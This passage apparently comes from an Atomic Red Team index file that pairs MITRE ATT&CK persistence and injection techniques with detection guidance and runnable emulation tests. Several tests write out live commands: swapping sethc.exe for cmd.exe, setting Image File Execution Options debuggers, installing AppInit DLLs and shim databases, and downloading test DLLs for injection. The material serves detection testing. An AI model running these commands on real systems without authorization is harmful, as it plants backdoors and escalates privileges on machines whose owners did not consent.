command-line activity. - Specifically, analysts should look for use of the runas command. - Detailed command-line logging is not enabled by default in Windows.(Citation: - Microsoft Command-line Logging)\n\nIf an adversary is using a payload that - calls the Windows token APIs directly, analysts can detect token manipulation - only through careful analysis of user network activity, examination of running - processes, and correlation with other endpoint and network behavior. \n\nThere - are many Windows API calls a payload can take advantage of to manipulate access - tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: - Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: - Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API - pages for more information.\n\nQuery systems for process and thread token - information and look for inconsistencies such as user owns processes impersonating - the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook - for inconsistencies between the various fields that store PPID information, - such as the EventHeader ProcessId from data collected via Event Tracing for - Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID - and ParentProcessID (which are also produced from ETW and other utilities - such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId - identifies the actual parent process." 
- x_mitre_permissions_required: - - User - - Administrator - x_mitre_effective_permissions: - - SYSTEM - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.008: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.008 - url: https://attack.mitre.org/techniques/T1546/008 - - external_id: CAPEC-558 - source_name: capec - url: https://capec.mitre.org/data/definitions/558.html - - url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html - description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: - Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.' - source_name: FireEye Hikit Rootkit - - url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom - description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to - the Kingdom. Retrieved July 5, 2017. - source_name: DEFCON2016 Sticky Keys - - url: http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. - Retrieved November 12, 2014. - source_name: Tilbury 2014 - - source_name: Narrator Accessibility Abuse - url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html - description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub' - URI for Fileless Persistence. Retrieved April 28, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Accessibility Features - description: |- - Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). 
An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. - - Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit) - - Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. - - For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. 
(Citation: Tilbury 2014) - - Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse) - - * On-Screen Keyboard: C:\Windows\System32\osk.exe - * Magnifier: C:\Windows\System32\Magnify.exe - * Narrator: C:\Windows\System32\Narrator.exe - * Display Switcher: C:\Windows\System32\DisplaySwitch.exe - * App Switcher: C:\Windows\System32\AtBroker.exe - id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-13T20:37:30.048Z' - created: '2020-01-24T14:32:40.315Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Changes to accessibility utility binaries or binary paths - that do not correlate with known software, patch cycles, etc., are suspicious. - Command line invocation of tools capable of modifying the Registry for associated - keys are also suspicious. Utility arguments and the binaries themselves should - be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows - NT\CurrentVersion\Image File Execution Options. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Paul Speulstra, AECOM Global Security Operations Center - x_mitre_platforms: - - Windows - identifier: T1546.008 - atomic_tests: - - name: Attaches Command Prompt as a Debugger to a List of Target Processes - auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - description: | - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. 
- - Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. - supported_platforms: - - windows - input_arguments: - parent_list: - description: 'Comma separated list of system binaries to which you want - to attach each #{attached_process}. Default: "osk.exe" - -' - type: String - default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, - atbroker.exe - attached_process: - description: 'Full path to process to attach to target in #{parent_list}. - Default: cmd.exe - -' - type: Path - default: C:\windows\system32\cmd.exe - executor: - command: | - $input_table = "#{parent_list}".split(",") - $Name = "Debugger" - $Value = "#{attached_process}" - Foreach ($item in $input_table){ - $item = $item.trim() - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - } - cleanup_command: | - $input_table = "#{parent_list}".split(",") - Foreach ($item in $input_table) - { - $item = $item.trim() - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null - } - name: powershell - elevation_required: true - - name: Replace binary of sticky keys - auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - -' - supported_platforms: - - windows - executor: - command: | - copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe - takeown /F C:\Windows\System32\sethc.exe /A - icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t - copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe - cleanup_command: 'copy /Y 
C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - -' - name: command_prompt - elevation_required: true - T1546.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.009 - url: https://attack.mitre.org/techniques/T1546/009 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://forum.sysinternals.com/appcertdlls_topic12546.html - description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. - Retrieved December 18, 2017. - source_name: Sysinternals AppCertDlls Oct 2007 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppCert DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppCert DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs - Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session - Manager\\ are loaded into every process that calls the ubiquitously - used application programming interface (API) functions CreateProcess, - CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, - or WinExec. 
(Citation: Endgame Process Injection July 2017)\n\nSimilar - to [Process Injection](https://attack.mitre.org/techniques/T1055), this value - can be abused to obtain elevated privileges by causing a malicious DLL to - be loaded and run in the context of separate processes on the computer. Malicious - AppCert DLLs may also provide persistence by continuously being triggered - by API activity. " - id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:22:45.298Z' - created: '2020-01-24T14:47:41.795Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: "Monitor DLL loads by processes, specifically looking for - DLLs that are not recognized or not normally loaded into a process. Monitor - the AppCertDLLs Registry value for modifications that do not correlate with - known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools - such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting - location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls - Oct 2007)\n\nLook for abnormal process behavior that may be due to a process - loading a malicious DLL. Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as making network connections for Command and Control, learning details about - the environment through Discovery, and conducting Lateral Movement." 
- x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.010 - url: https://attack.mitre.org/techniques/T1546/010 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://support.microsoft.com/en-us/kb/197571 - description: Microsoft. (2006, October). Working with the AppInit_DLLs registry - value. Retrieved July 15, 2015. - source_name: AppInit Registry - - url: https://msdn.microsoft.com/en-us/library/dn280412 - description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July - 15, 2015. - source_name: AppInit Secure Boot - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppInit DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppInit DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs - value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows - NT\\CurrentVersion\\Windows are loaded by user32.dll into every process - that loads user32.dll. 
In practice this is nearly every program, since user32.dll - is a very common library. (Citation: Endgame Process Injection July 2017)\n\nSimilar - to Process Injection, these values can be abused to obtain elevated privileges - by causing a malicious DLL to be loaded and run in the context of separate - processes on the computer. (Citation: AppInit Registry) Malicious AppInit - DLLs may also provide persistence by continuously being triggered by API activity. - \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions - when secure boot is enabled. (Citation: AppInit Secure Boot)" - id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:34:09.996Z' - created: '2020-01-24T14:52:25.589Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Secure boot disabled on systems running Windows 8 and later - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and - look for DLLs that are not recognized or not normally loaded into a process. - Monitor the AppInit_DLLs Registry values for modifications that do not correlate - with known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July - 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system - changes that could be attempts at persistence, including listing current AppInit - DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior - that may be due to a process loading a malicious DLL. 
Data and events should - not be viewed in isolation, but as part of a chain of behavior that could - lead to other activities, such as making network connections for Command and - Control, learning details about the environment through Discovery, and conducting - Lateral Movement." - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1546.010 - atomic_tests: - - name: Install AppInit Shim - auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 - description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs - to be loaded into each user mode process on the system. Upon succesfully execution, - \nyou will see the message \"The operation completed successfully.\" Each - time the DLL is loaded, you will see a message box with a message of \"Install - AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your - computer starts up various applications and may in fact drive you crazy. A - reliable way to make the message box appear and verify the \nAppInit Dlls - are loading is to start the notepad application. 
Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" - supported_platforms: - - windows - input_arguments: - registry_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg - registry_cleanup_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg - dependency_executor_name: powershell - dependencies: - - description: 'Reg files must exist on disk at specified locations (#{registry_file} - and #{registry_cleanup_file}) - -' - prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) - {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" - - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and - T1546.010x86.dll) - -' - prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) - {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll - executor: - command: 'reg.exe import #{registry_file} - -' - cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - -' - 
name: command_prompt - elevation_required: true - T1546.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.011 - url: https://attack.mitre.org/techniques/T1546/011 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - source_name: FireEye Application Shimming - url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf - description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved - May 4, 2020. - - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf - description: Pierce, Sean. (2015, November). Defending Against Malicious Application - Compatibility Shims. Retrieved June 22, 2017. - source_name: Black Hat 2015 App Shim - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Application Shimming - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by application shims. The Microsoft - Windows Application Compatibility Infrastructure/Framework (Application Shim) - was created to allow for backward compatibility of software as the operating - system codebase changes over time. For example, the application shimming feature - allows developers to apply fixes to applications (without rewriting code) - that were created for Windows XP so that it will work with Windows 10. 
(Citation: - Endgame Process Injection July 2017)\n\nWithin the framework, shims are created - to act as a buffer between the program (or more specifically, the Import Address - Table) and the Windows OS. When a program is executed, the shim cache is referenced - to determine if the program requires the use of the shim database (.sdb). - If so, the shim database uses hooking to redirect the code as necessary in - order to communicate with the OS. \n\nA list of all shims currently installed - by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom - databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo - keep shims secure, Windows designed them to run in user mode so they cannot - modify the kernel and you must have administrator privileges to install a - shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) - (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data - Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), - and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims - may allow an adversary to perform several malicious acts such as elevate privileges, - install backdoors, disable defenses like Windows Defender, etc. (Citation: - FireEye Application Shimming) Shims can also be abused to establish persistence - by continuously being invoked by affected programs." 
- id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-04T19:05:30.140Z' - created: '2020-01-24T14:56:24.231Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): - - * Shim-Process-Scanner - checks memory of every running process for any shim flags - * Shim-Detector-Lite - detects installation of custom shim databases - * Shim-Guard - monitors registry for any shim installations - * ShimScanner - forensic tool to find active shims in memory - * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) - - Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_platforms: - - Windows - identifier: T1546.011 - atomic_tests: - - name: Application Shim Installation - auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 - description: "Install a shim database. This technique is used for privilege - escalation and bypassing user access control.\nUpon execution, \"Installation - of AtomicShim complete.\" will be displayed. To verify the shim behavior, - run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin - directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" - as defined in the AtomicTest.dll. 
To better understand what is happening, - review\nthe source code files is the \\\\T1546.011\\\\src - directory.\n" - supported_platforms: - - windows - input_arguments: - file_path: - description: Path to the shim database file - type: String - default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb - dependency_executor_name: powershell - dependencies: - - description: 'Shim database file must exist on disk at specified location - (#{file_path}) - -' - prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - -' - prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit - 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll - executor: - command: 'sdbinst.exe #{file_path} - -' - cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: New shim database files created in the default shim database directory - auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d - description: | - Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb 
C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb - cleanup_command: | - Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore - Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Registry key creation and/or modification events for SDB - auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f - description: | - Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing - the registry keys that were created. These keys can also be viewed using the Registry Editor. - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - cleanup_command: | - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - name: powershell - elevation_required: true - T1055.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.004 - url: https://attack.mitre.org/techniques/T1055/004 - - url: https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx - description: Microsoft. (n.d.). Asynchronous Procedure Calls. 
Retrieved December - 8, 2017. - source_name: Microsoft APC - - url: https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/ - description: Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ - Code Injection Technique Discovered. Retrieved May 24, 2018. - source_name: CyberBit Early Bird Apr 2018 - - url: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows - description: 'Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE - INJECTION FOR WINDOWS. Retrieved December 8, 2017.' - source_name: ENSIL AtomBombing Oct 2016 - - url: https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx - description: Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017. - source_name: Microsoft Atom Table - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Asynchronous Procedure Call - description: "Adversaries may inject malicious code into processes via the asynchronous - procedure call (APC) queue in order to evade process-based defenses as well - as possibly elevate privileges. APC injection is a method of executing arbitrary - code in the address space of a separate live process. \n\nAPC injection is - commonly performed by attaching malicious code to the APC Queue (Citation: - Microsoft APC) of a process's thread. 
Queued APC functions are executed when - the thread enters an alterable state.(Citation: Microsoft APC) A handle to - an existing victim process is first created with native Windows API calls - such as OpenThread. At this point QueueUserAPC can - be used to invoke a function (such as LoadLibrayA pointing to - a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", - involves creating a suspended process in which malicious code can be written - and executed before the process' entry point (and potentially subsequent anti-malware - hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: - ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke - malicious code previously written to the global atom table.(Citation: Microsoft - Atom Table)\n\nRunning code in the context of another process may allow access - to the process's memory, system/network resources, and possibly elevated privileges. - Execution via APC injection may also evade detection from security products - since the execution is masked under a legitimate process. " - id: attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:17:05.394Z' - created: '2020-01-14T01:29:43.786Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. 
Windows API calls - such as SuspendThread/SetThreadContext/ResumeThread, - QueueUserAPC/NtQueueApcThread, and those that can - be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - identifier: T1055.004 - atomic_tests: - - name: Process Injection via C# - auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 - description: | - Process Injection using C# - reference: https://github.com/pwndizzle/c-sharp-memory-injection - Excercises Five Techniques - 1. Process injection - 2. ApcInjectionAnyProcess - 3. ApcInjectionNewProcess - 4. IatInjection - 5. ThreadHijack - Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. - supported_platforms: - - windows - input_arguments: - exe_binary: - description: Output Binary - type: Path - default: PathToAtomicsFolder\T1055.004\bin\T1055.exe - executor: - command: "#{exe_binary}\n" - name: command_prompt - T1053.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.001 - url: https://attack.mitre.org/techniques/T1053/001 - - source_name: Kifarunix - Task Scheduling in Linux - url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ - description: Koromicha. (2019, September 7). Scheduling tasks using at command - in Linux. Retrieved December 3, 2019. 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Linux) - description: |- - Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) - - An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. - id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:35:13.112Z' - created: '2019-12-03T12:59:36.749Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_detection: "Monitor scheduled task creation using command-line invocation. - Legitimate scheduled tasks may be created during installation of new software - or through system administration functions. Look for changes to tasks that - do not correlate with known software, patch cycles, etc. \n\nSuspicious program - execution through scheduled tasks may show up as outlier 